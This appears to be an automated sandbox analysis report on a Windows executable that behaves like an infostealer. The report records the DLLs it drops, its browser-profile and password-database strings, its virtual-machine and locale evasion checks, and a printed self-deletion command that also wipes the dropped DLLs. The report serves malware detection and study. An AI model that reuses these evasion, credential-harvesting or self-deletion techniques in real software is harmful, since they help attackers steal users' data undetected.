Source: Vk2yYa9dHl.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Vk2yYa9dHl.exe, Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Vk2yYa9dHl.exe, 00000000.00000003.1692017694.0000000020C64000.00000004.00000020.00020000.00000000.sdmp, KKEBKJJDGHCBGCAAKEHD.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Vk2yYa9dHl.exe, 00000000.00000002.1771790477.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1764794724.000000001ACE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: Vk2yYa9dHl.exe ReversingLabs: Detection: 87%
Source: unknown Process created: C:\Users\user\Desktop\Vk2yYa9dHl.exe "C:\Users\user\Desktop\Vk2yYa9dHl.exe"
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\Vk2yYa9dHl.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\Vk2yYa9dHl.exe" & del "C:\ProgramData\*.dll"" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Vk2yYa9dHl.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: Vk2yYa9dHl.exe, 00000000.00000002.1771981611.000000006CD3D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Vk2yYa9dHl.exe, 00000000.00000002.1772213948.000000006CEFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Vk2yYa9dHl.exe, 00000000.00000002.1771981611.000000006CD3D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00066240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00066240
PE file contains sections with non-standard names
Source: Vk2yYa9dHl.exe Static PE information: section name: ldklgy
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000676C5 push ecx; ret 0_2_000676D8
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCFB536 push ecx; ret 0_2_6CCFB549
Drops PE files
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\Vk2yYa9dHl.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\Vk2yYa9dHl.exe" & del "C:\ProgramData\*.dll"" & exit Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00066240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00066240
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API coverage: 6.5 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0005D1C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_000515C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0005B610
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0005DB60
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_0005D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0005D540
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00062570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00062570
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000621F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_000621F0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00061650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00061650
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00061B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00061B80
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00051120 GetSystemInfo,ExitProcess, 0_2_00051120
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp, Vk2yYa9dHl.exe, 00000000.00000002.1754008719.0000000000974000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
